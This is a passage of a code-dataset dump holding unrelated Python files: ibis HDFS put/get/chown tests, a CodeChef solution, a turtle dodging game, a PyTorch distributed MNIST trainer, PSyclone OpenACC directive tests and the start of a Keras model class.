test_put_get_delete_file(self):\n dirpath = pjoin(self.tmp_dir, 'write-delete-test')\n self.hdfs.mkdir(dirpath)\n\n lpath = self._make_random_file()\n fpath = pjoin(dirpath, lpath)\n\n self.hdfs.put(fpath, lpath)\n assert self.hdfs.exists(fpath)\n\n try:\n dpath = util.guid()\n self.hdfs.get(fpath, dpath)\n assert _contents_equal(dpath, lpath)\n os.remove(dpath)\n finally:\n self.hdfs.rm(fpath)\n assert not self.hdfs.exists(fpath)\n\n def test_overwrite_file(self):\n pass\n\n def test_put_get_directory(self):\n local_dir = util.guid()\n local_download_dir = util.guid()\n\n K = 5\n\n os.mkdir(local_dir)\n\n try:\n for i in range(K):\n self._make_random_file(directory=local_dir)\n\n remote_dir = pjoin(self.tmp_dir, local_dir)\n self.hdfs.put(remote_dir, local_dir)\n\n assert self.hdfs.exists(remote_dir)\n assert len(self.hdfs.ls(remote_dir)) == K\n\n # download directory and check contents\n self.hdfs.get(remote_dir, local_download_dir)\n\n _check_directories_equal(local_dir, local_download_dir)\n\n self._try_delete_directory(local_download_dir)\n\n self.hdfs.rmdir(remote_dir)\n assert not self.hdfs.exists(remote_dir)\n finally:\n shutil.rmtree(local_dir)\n\n def test_put_file_into_directory(self):\n local_path = self._make_random_file()\n self.hdfs.put(self.tmp_dir, local_path)\n remote_file_path = pjoin(self.tmp_dir, local_path)\n file_status = self.hdfs.status(remote_file_path)\n assert file_status['type'] == 'FILE'\n\n def test_get_file_overwrite(self):\n local_path = self._make_random_file()\n local_path2 = self._make_random_file()\n\n remote_path = pjoin(self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n\n remote_path2 = pjoin(self.tmp_dir, local_path2)\n self.hdfs.put(remote_path2, local_path2)\n\n with self.assertRaises(Exception):\n self.hdfs.get(remote_path, '.')\n\n self.hdfs.get(remote_path, local_path2, overwrite=True)\n assert open(local_path2).read() == open(local_path).read()\n\n def test_put_buffer_like(self):\n data = b'peekaboo'\n\n buf = BytesIO()\n buf.write(data)\n buf.seek(0)\n\n remote_path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.put(remote_path, buf)\n\n local_path = util.guid()\n self.test_files.append(local_path)\n\n self.hdfs.get(remote_path, local_path)\n assert open(local_path, 
'rb').read() == data\n\n def test_get_logging(self):\n # TODO write a test for this\n pass\n\n def test_get_directory_nested_dirs(self):\n local_dir = util.guid()\n local_download_dir = util.guid()\n\n K = 5\n\n os.mkdir(local_dir)\n\n try:\n for i in range(K):\n self._make_random_file(directory=local_dir)\n\n nested_dir = osp.join(local_dir, 'nested-dir')\n shutil.copytree(local_dir, nested_dir)\n\n remote_dir = pjoin(self.tmp_dir, local_dir)\n self.hdfs.put(remote_dir, local_dir)\n\n # download directory and check contents\n self.hdfs.get(remote_dir, local_download_dir)\n\n _check_directories_equal(local_dir, local_download_dir)\n\n self._try_delete_directory(local_download_dir)\n\n self.hdfs.rmdir(remote_dir)\n assert not self.hdfs.exists(remote_dir)\n finally:\n shutil.rmtree(local_dir)\n\n def test_get_directory_overwrite_file(self):\n try:\n local_path1 = self._make_test_directory()\n local_path2 = self._make_random_file()\n remote_path = pjoin(self.tmp_dir, local_path1)\n self.hdfs.put(remote_path, local_path1)\n self.hdfs.get(remote_path, local_path2, overwrite=True)\n _check_directories_equal(local_path1, local_path2)\n finally:\n # Path changed from file to directory, must be cleaned manually.\n self._try_delete_directory(local_path2)\n\n def test_get_directory_overwrite_directory(self):\n local_path1 = self._make_test_directory()\n local_path2 = self._make_test_directory()\n remote_path = pjoin(self.tmp_dir, local_path2)\n self.hdfs.put(remote_path, local_path1)\n self.hdfs.get(remote_path, osp.dirname(local_path2), overwrite=True)\n _check_directories_equal(local_path1, local_path2)\n\n def test_get_directory_into_directory(self):\n local_path1 = self._make_test_directory()\n local_path2 = self._make_test_directory()\n remote_path = pjoin(self.tmp_dir, local_path1)\n self.hdfs.put(remote_path, local_path1)\n local_path3 = self.hdfs.get(remote_path, local_path2)\n _check_directories_equal(local_path3, local_path1)\n\n def _try_delete_directory(self, path):\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def test_ls(self):\n test_dir = pjoin(self.tmp_dir, 'ls-test')\n self.hdfs.mkdir(test_dir)\n for i in range(10):\n local_path = self._make_random_file()\n hdfs_path = pjoin(test_dir, local_path)\n self.hdfs.put(hdfs_path, local_path)\n assert len(self.hdfs.ls(test_dir)) == 10\n\n def test_size(self):\n test_dir = pjoin(self.tmp_dir, 'size-test')\n\n K = 2048\n path = self._make_random_file(size=K)\n hdfs_path = pjoin(test_dir, path)\n self.hdfs.put(hdfs_path, path)\n assert self.hdfs.size(hdfs_path) == K\n\n size_test_dir = self._sample_nested_directory()\n\n hdfs_path = pjoin(test_dir, size_test_dir)\n self.hdfs.put(hdfs_path, size_test_dir)\n\n assert self.hdfs.size(hdfs_path) == K * 7\n\n def test_put_get_tarfile(self):\n test_dir = pjoin(self.tmp_dir, 'tarfile-test')\n\n dirname = self._sample_nested_directory()\n\n import subprocess\n tf_name = '{0}.tar.gz'.format(dirname)\n cmd = 'tar zc {0} > {1}'.format(dirname, tf_name)\n\n retcode = subprocess.call(cmd, shell=True)\n if retcode:\n raise Exception((retcode, cmd))\n\n self.test_files.append(tf_name)\n\n randname = util.guid()\n hdfs_path = pjoin(test_dir, randname)\n self.hdfs.put_tarfile(hdfs_path, tf_name, compression='gzip')\n\n self.hdfs.get(hdfs_path, '.')\n self.test_directories.append(randname)\n _check_directories_equal(osp.join(randname, dirname), dirname)\n\n def _sample_nested_directory(self):\n K = 2048\n dirname = self._make_test_directory(files=2, filesize=K)\n nested_dir = osp.join(dirname, 
util.guid())\n os.mkdir(nested_dir)\n\n self._make_test_directory(files=5, filesize=K,\n directory=nested_dir)\n\n return dirname\n\n\n@pytest.mark.hdfs\n@pytest.mark.superuser\nclass TestSuperUserHDFSE2E(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.ENV = ENV\n cls.tmp_dir = pjoin(cls.ENV.tmp_dir, util.guid())\n if cls.ENV.auth_mechanism in ['GSSAPI', 'LDAP']:\n print(\"Warning: ignoring invalid Certificate Authority errors\")\n # NOTE: specifying superuser as set in IbisTestEnv\n cls.hdfs = ibis.hdfs_connect(host=cls.ENV.nn_host,\n port=cls.ENV.webhdfs_port,\n auth_mechanism=cls.ENV.auth_mechanism,\n verify=(cls.ENV.auth_mechanism\n not in ['GSSAPI', 'LDAP']),\n user=cls.ENV.hdfs_superuser)\n cls.hdfs.mkdir(cls.tmp_dir)\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.hdfs.rmdir(cls.tmp_dir)\n except:\n pass\n\n def setUp(self):\n self.test_files = []\n self.test_directories = []\n\n def tearDown(self):\n self._delete_test_files()\n pass\n\n def _delete_test_files(self):\n for path in self.test_files:\n try:\n os.remove(path)\n except os.error:\n pass\n\n for path in self.test_directories:\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def _make_random_file(self, size=1024, directory=None):\n path = util.guid()\n\n if directory:\n path = osp.join(directory, path)\n\n units = size / 32\n\n with open(path, 'wb') as f:\n for i in range(int(units)):\n f.write(guidbytes())\n\n self.test_files.append(path)\n return path\n\n def _make_random_hdfs_file(self, size=1024, directory=None):\n local_path = self._make_random_file(size=size)\n remote_path = pjoin(directory or self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n return remote_path\n\n def test_chown_owner(self):\n new_owner = 'randomowner'\n path = self._make_random_hdfs_file()\n self.hdfs.chown(path, new_owner)\n assert self.hdfs.status(path)['owner'] == new_owner\n\n def test_chown_group(self):\n new_group = 'randomgroup'\n path = self._make_random_hdfs_file()\n self.hdfs.chown(path, group=new_group)\n assert self.hdfs.status(path)['group'] == new_group\n\n def test_chown_group_directory(self):\n new_group = 'randomgroup'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chown(path, group=new_group)\n assert self.hdfs.status(path)['group'] == new_group\n\n def test_chown_owner_directory(self):\n new_owner = 'randomowner'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chown(path, new_owner)\n assert self.hdfs.status(path)['owner'] == new_owner\n\n\ndef _check_directories_equal(left, right):\n left_files = _get_all_files(left)\n right_files = _get_all_files(right)\n\n assert set(left_files.keys()) == set(right_files.keys())\n\n for relpath, labspath in left_files.items():\n rabspath = right_files[relpath]\n assert _contents_equal(rabspath, labspath)\n\n\ndef _contents_equal(left, right):\n with open(left) as lf:\n with open(right) as rf:\n return lf.read() == rf.read()\n\n\ndef _get_all_files(path):\n paths = {}\n for dirpath, _, filenames in os.walk(path):\n rel_dir = osp.relpath(dirpath, path)\n if rel_dir == '.':\n rel_dir = ''\n for name in filenames:\n abspath = osp.join(dirpath, name)\n relpath = osp.join(rel_dir, name)\n paths[relpath] = abspath\n\n return paths\n\n\ndef guidbytes():\n if compat.PY3:\n return util.guid().encode('utf8')\n else:\n return 
util.guid()\n","sub_path":"ibis/tests/test_filesystems.py","file_name":"test_filesystems.py","file_ext":"py","file_size_in_byte":16773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85307008","text":"'''\n2\n5 1 1\n1 1 1 1 1\n2 1 1\n1 2\n'''\nfrom collections import Counter\nfor _ in range(int(input())):\n    n, a, b = [int(x) for x in input().split()]\n    arr = [int(x) for x in input().split()]\n    arrc = Counter(arr)\n    ans = (arrc[a] / n) * (arrc[b] / n)\n    print(ans)\n","sub_path":"codechef/May18_1_NAICHEF.py","file_name":"May18_1_NAICHEF.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324292323","text":"import turtle \n\n\nscreen=turtle.Screen()\nscreen.bgcolor(\"whitesmoke\")\nt=turtle.Turtle()\nt.hideturtle()\nm=t.clone()\nm.hideturtle()\ne=t.clone()\ne.hideturtle()\nh=t.clone()\nh.hideturtle()\nt.shape(\"circle\")\nm.shape(\"square\")\ne.shape(\"square\")\nh.shape(\"square\")\nt.shapesize(3)\nm.shapesize(5)\ne.shapesize(4)\nh.shapesize(7)\nt.color(\"dodgerblue\")\nm.color(\"gold\")\ne.color(\"springgreen\")\nh.color(\"red\")\nt.speed(0)\nscreen.update()\n\nscreen.bgpic('Planebackground.png')\n\nt.pu()\nt.goto(0,-220)\nt.showturtle()\nt.setheading(90)\n\nscreen.title(\"the coolest game you have ever seen\")\n\n\n\ndef medium():\n    \n    m.pu()\n    m.goto(0,550)\n    m.showturtle()\n    m.setheading(270)\n    m.fd(1050)\n    \n\ndef medium2():\n    \n    \n    m.pu()\n    \n    m.goto(-200,550)\n    m.showturtle()\n\n    \n    \n    m.setheading(270)\n    m.fd(1050)\n\ndef medium3():\n    \n    m.pu()\n    m.goto(300,550)\n    m.showturtle()\n    \n    m.setheading(270)\n    m.fd(1050)\n\ndef easy():\n    \n    e.pu()\n    e.goto(-200,550)\n    e.showturtle()\n    \n\n    e.setheading(270)\n    e.fd(1050)\n\nscreen.listen()\n\ndef easy2():\n    \n    e.pu()\n    e.goto(150,550)\n    e.showturtle()\n    \n\n    e.setheading(270)\n    e.fd(1050)\n    \nscreen.listen()\n\ndef easy3():\n    \n    e.pu()\n    e.goto(50,550)\n    e.showturtle()\n    \n\n    e.setheading(270)\n    e.fd(1050)\n\nscreen.listen()\n\ndef hard():\n    \n    h.pu()\n    h.goto(0,630)\n    h.showturtle()\n    \n\n    h.setheading(270)\n    h.fd(1150)\n\nscreen.listen()\n    \ndef hard2():\n\n    h.pu()\n    h.goto(200,630)\n    h.showturtle()\n    \n\n    h.setheading(270)\n    h.fd(1150)\n\nscreen.listen()\n\ndef hard3():\n\n    h.pu()\n    h.goto(-200,630)\n    h.showturtle()\n    \n\n    h.setheading(270)\n    h.fd(1150)\n\nscreen.listen()\n\ndef hit():\n    print(\"baba\")\n    if t.distance(m.pos()) < 100:\n        screen.clear()\n        print(\"haha\")\n        \n    if t.distance(e.pos()) < 100:\n        t.clear()\n        print(\"haha\")\n        \n    if t.distance(h.pos()) < 100:\n        t.clear()    \n        print(\"haha\")    \n\ndef left():\n    t.setheading(180)\n    t.forward(25)\n    t.forward(25)\n    \ndef right():\n    t.setheading(0)\n    t.forward(25)\n    t.forward(25)\n    \nscreen.onkey(left, 'Left')\nscreen.onkey(right, 'Right')\nscreen.ontimer(hit, 
1000)\n\nmedium2()\neasy2()\nhard3()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium()\neasy3()\nhard()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium2()\neasy()\nhard2()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium()\neasy3()\nhard()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\n\n\nscreen.mainloop()","sub_path":"Codes/LeoGame.py","file_name":"LeoGame.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334250942","text":"\"\"\"\nAdapted from PyTorch 1.0 Distributed Trainer with Amazon AWS\n\"\"\"\n\n\nimport time\nimport sys\nimport torch\nimport argparse\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.distributed as dist\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom torch.multiprocessing import Pool, Process\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.utils import data\nfrom torch.utils.data.distributed import DistributedSampler\n\nclass Average(object):\n def __init__(self):\n self.sum = 0\n self.count = 0\n\n def update(self, value, number):\n self.sum += value * number\n self.count += number\n\n @property\n def average(self):\n return self.sum / self.count\n\n def __str__(self):\n return '{:.6f}'.format(self.average)\n\n\nclass Accuracy(object):\n def __init__(self):\n self.correct = 0\n self.count = 0\n\n def update(self, output, label):\n predictions = output.data.argmax(dim=1)\n correct = predictions.eq(label.data).sum().item()\n\n self.correct += correct\n self.count += output.size(0)\n\n @property\n def accuracy(self):\n return self.correct / self.count\n\n def __str__(self):\n return '{:.2f}%'.format(self.accuracy * 100)\n\n\nclass Trainer(object):\n def __init__(self, net, optimizer, train_loader, test_loader, loss):\n self.net = net\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.loss = loss\n\n def fit(self, epochs):\n for epoch in range(1, epochs + 1):\n epoch_start = time.time()\n train_loss, train_acc = self.train()\n test_loss, test_acc = self.evaluate()\n epoch_time = time.time()-epoch_start\n print(\n 'Epoch: {}/{},'.format(epoch, epochs),\n 'train loss: {}, train acc: {},'.format(train_loss, train_acc),\n 'test loss: {}, test acc: {}.'.format(test_loss, test_acc),\n 'epoch time: {}'.format(epoch_time))\n\n def train(self):\n train_loss = Average()\n train_acc = Accuracy()\n\n self.net.train()\n\n for data, label in self.train_loader:\n data = data.cuda(non_blocking=True)\n label = label.cuda(non_blocking=True)\n\n output = self.net(data)\n loss = self.loss(output, label)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n train_loss.update(loss.item(), data.size(0))\n train_acc.update(output, label)\n\n return train_loss, train_acc\n\n def evaluate(self):\n test_loss = Average()\n test_acc = Accuracy()\n\n self.net.eval()\n\n with torch.no_grad():\n for data, label in 
self.test_loader:\n data = data.cuda(non_blocking=True)\n label = label.cuda(non_blocking=True)\n\n output = self.net(data)\n loss = F.cross_entropy(output, label)\n\n test_loss.update(loss.item(), data.size(0))\n test_acc.update(output, label)\n\n return test_loss, test_acc\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc = nn.Linear(784, 10)\n\n def forward(self, x):\n return self.fc(x.view(x.size(0), -1))\n\n\ndef get_dataloader(root, batch_size):\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.1307, ), (0.3081, ))])\n\n train_set = datasets.MNIST(\n root, train=True, transform=transform, download=True)\n sampler = DistributedSampler(train_set)\n\n train_loader = data.DataLoader(\n train_set,\n batch_size=batch_size,\n shuffle=(sampler is None),\n sampler=sampler)\n\n test_loader = data.DataLoader(\n datasets.MNIST(root, train=False, transform=transform, download=True),\n batch_size=batch_size,\n shuffle=False)\n\n return train_loader, test_loader\n\n\nif __name__ == '__main__':\n \n initial_time = time.time()\n print(\"Collect Inputs...\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--local_rank\", type=int)\n parser.add_argument(\"--dir\", type=str, default='./data')\n parser.add_argument(\"--batch\", type=int, default=32)\n parser.add_argument(\"--epochs\", type=int, default=10)\n args = parser.parse_args()\n \n \n\n # Batch Size for training and testing\n batch_size = args.batch\n \n # Number of additional worker processes for dataloading\n workers = 2\n\n # Number of epochs to train for\n num_epochs = args.epochs\n\n # Starting Learning Rate\n starting_lr = 0.1\n\n # Distributed backend type\n dist_backend = 'nccl'\n print(\"Data Directory: {}\".format(args.dir))\n print(\"Batch Size: {}\".format(args.batch))\n print(\"Max Number of Epochs: {}\".format(args.epochs))\n print(\"Initialize Process Group...\")\n\n torch.cuda.set_device(args.local_rank)\n\n torch.distributed.init_process_group(backend=dist_backend,\n init_method='env://')\n torch.multiprocessing.set_start_method('spawn')\n\n\n # Establish Local Rank and set device on this node\n local_rank = args.local_rank\n dp_device_ids = [local_rank]\n\n print(\"Initialize Model...\")\n # Construct Model\n model = Net().cuda()\n # Make model DistributedDataParallel\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=dp_device_ids, output_device=local_rank)\n\n # define loss function (criterion) and optimizer\n loss = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), starting_lr, momentum=0.9, weight_decay=1e-4)\n\n print(\"Initialize Dataloaders...\")\n train_loader, test_loader = get_dataloader(args.dir, batch_size)\n print(\"Training...\")\n trainer = Trainer(model, optimizer, train_loader, test_loader, loss)\n trainer.fit(num_epochs)\n\n print(\"Total time: {:.3f}s\".format(time.time()-initial_time))","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394492636","text":"# -----------------------------------------------------------------------------\n# BSD 3-Clause License\n#\n# Copyright (c) 2019-2021, Science and Technology Facilities Council.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source 
code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n# Authors: R. W. Ford, A. R. Porter and S. Siso, STFC Daresbury Lab\n\n'''Module containing py.test tests for the transformation of the PSy\n representation of NEMO code using the OpenACC parallel directive.\n\n'''\n\nfrom __future__ import print_function, absolute_import\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.psyGen import PSyFactory, TransInfo\nfrom psyclone.psyir.nodes import ACCParallelDirective\n\n\n# The PSyclone API under test\nAPI = \"nemo\"\n\n\nSINGLE_LOOP = (\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpj=128\\n\"\n \"real(kind=wp) :: sto_tmp(jpj)\\n\"\n \"do ji = 1,jpj\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"end program do_loop\\n\")\n\n\ndef test_parallel_single_loop(parser):\n ''' Check that we can apply the transformation to a single, explicit\n loop. '''\n reader = FortranStringReader(SINGLE_LOOP)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:1])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n\n assert (\"PROGRAM do_loop\\n\"\n \" INTEGER :: ji\\n\"\n \" INTEGER, PARAMETER :: jpj = 128\\n\"\n \" REAL(KIND = wp) :: sto_tmp(jpj)\\n\"\n \" !$ACC DATA COPYOUT(sto_tmp)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" DO ji = 1, jpj\\n\"\n \" sto_tmp(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\"\n \"END PROGRAM do_loop\" in code)\n\n\ndef test_parallel_two_loops(parser):\n ''' Check that we can enclose two loops within a parallel region. 
'''\n reader = FortranStringReader(\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpi=11\\n\"\n \"real :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \"do ji = 1,jpi\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"do ji = 1,jpi\\n\"\n \" sto_tmp2(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"end program do_loop\\n\")\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:2])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n assert (\"PROGRAM do_loop\\n\"\n \" INTEGER :: ji\\n\"\n \" INTEGER, PARAMETER :: jpi = 11\\n\"\n \" REAL :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \" !$ACC DATA COPYOUT(sto_tmp,sto_tmp2)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" DO ji = 1, jpi\\n\"\n \" sto_tmp(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" DO ji = 1, jpi\\n\"\n \" sto_tmp2(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\"\n \"END PROGRAM do_loop\" in code)\n\n\ndef test_parallel_if_block(parser):\n ''' Check that we can enclose an IF-block within a parallel region. '''\n reader = FortranStringReader(\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpi=64\\n\"\n \"logical :: init\\n\"\n \"real :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \"if(init)then\\n\"\n \" do ji = 1,jpi\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \" end do\\n\"\n \"else\\n\"\n \" do ji = 1,jpi\\n\"\n \" sto_tmp2(ji) = 1.0d0\\n\"\n \" end do\\n\"\n \"end if\\n\"\n \"end program do_loop\\n\")\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:1])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n assert (\" !$ACC DATA COPYOUT(sto_tmp,sto_tmp2)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" IF (init) THEN\\n\"\n \" DO ji = 1, jpi\\n\" in code)\n assert (\" END DO\\n\"\n \" END IF\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\" in code)\n\n\ndef test_parallel_repeat_update(parser):\n ''' Check that calling ACCParallelDirective.update() a 2nd time\n does not alter the fparser2 parse tree. 
'''\n reader = FortranStringReader(SINGLE_LOOP)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule.children[0:1])\n data_trans.apply(schedule[0])\n accdir = schedule[0].dir_body[0]\n assert isinstance(accdir, ACCParallelDirective)\n assert accdir._ast is None\n # Generate the code in order to trigger the update of the fparser2 tree\n _ = str(psy.gen)\n # Store the content of a part of the fparser2 parse tree\n orig_content = accdir._ast.parent.content[:]\n # Call update() a second time and then check that nothing has changed\n accdir.update()\n for idx, item in enumerate(orig_content):\n assert item is accdir._ast.parent.content[idx]\n","sub_path":"src/psyclone/tests/nemo/transformations/openacc/parallel_directive_test.py","file_name":"parallel_directive_test.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451038901","text":"#!/usr/bin/env python3\n#-*- coding: utf-8\n\nimport importlib\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\n#Network\nfrom keras.models import Sequential,Model\nfrom keras.layers import Input,Activation\nfrom keras.layers import Dense, Dropout, Flatten, GlobalAveragePooling2D\nfrom keras.layers import ZeroPadding2D,Convolution2D, MaxPooling2D\nfrom keras import backend, optimizers\nfrom keras.utils import multi_gpu_model\nfrom keras.applications import vgg16\nfrom keras import regularizers\nfrom keras_contrib.layers import GroupNormalization\n\n#Locals\nfrom Utils import CacheManager\nfrom Models.GenericEnsemble import GenericEnsemble\n\nclass SNet(GenericEnsemble):\n \"\"\"\n Implements abstract methods from GenericModel.\n Model is the same as in: https://keras.io/examples/mnist_cnn/\n \"\"\"\n def __init__(self,config,ds,name=None):\n super().__init__(config,ds,name=name)\n if name is None:\n self.name = \"SNet\"\n self._modelCache = \"{0}-model.h5\".format(self.name)\n self._weightsCache = \"{0}-weights.h5\".format(self.name)\n self._mgpu_weightsCache = \"{0}-mgpu-weights.h5\".format(self.name)\n \n self.cache_m = CacheManager()\n self.cache_m.registerFile(os.path.join(config.model_path,self._modelCache),self._modelCache)\n self.cache_m.registerFile(os.path.join(config.weights_path,self._weightsCache),self._weightsCache)\n self.cache_m.registerFile(os.path.join(config.weights_path,self._mgpu_weightsCache),self._mgpu_weightsCache)\n\n self.single = None\n self.parallel = None\n \n def get_model_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._modelCache)\n \n def get_weights_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._weightsCache)\n\n def get_mgpu_weights_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._mgpu_weightsCache)\n\n \n def _build(self,width,height,channels,**kwargs):\n \"\"\"\n @param pre_trained : returned model should be pre-trained or not\n @param data_size : size of the training dataset\n \"\"\"\n training = kwargs.get('training',None)\n feature = kwargs.get('feature')\n preload = kwargs.get('preload')\n allocated_gpus = kwargs.get('allocated_gpus')\n \n if backend.image_data_format() == 'channels_first':\n input_shape = (channels, height, width)\n 
else:\n input_shape = (height, width, channels)\n\n self.cache_m = CacheManager()\n \n model = self._build_architecture(input_shape,training,feature)\n return self._configure_compile(model,allocated_gpus)\n\n def _configure_compile(self,model,allocated_gpus):\n #Check if previous training and LR is saved, if so, use it\n lr_cache = \"{0}_learning_rate.txt\".format(self.name)\n self.cache_m.registerFile(os.path.join(self._config.cache,lr_cache),lr_cache)\n l_rate = 0.0005\n if os.path.isfile(self.cache_m.fileLocation(lr_cache)) and not self._config.new_net:\n l_rate = float(self.cache_m.read(lr_cache))\n if self._config.info:\n print(\"Found previous learning rate: {0}\".format(l_rate))\n \n #opt = optimizers.SGD(lr=l_rate, decay=1.5e-4, momentum=0.9, nesterov=True)\n #opt = optimizers.Adam(lr = l_rate)\n opt = optimizers.Adadelta()\n\n #Return parallel model if multiple GPUs are available\n parallel_model = None\n \n if self._config.gpu_count > 1:\n with tf.device('/cpu:0'):\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n parallel_model = multi_gpu_model(model,gpus=self._config.gpu_count)\n parallel_model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'],\n #options=p_opt, \n 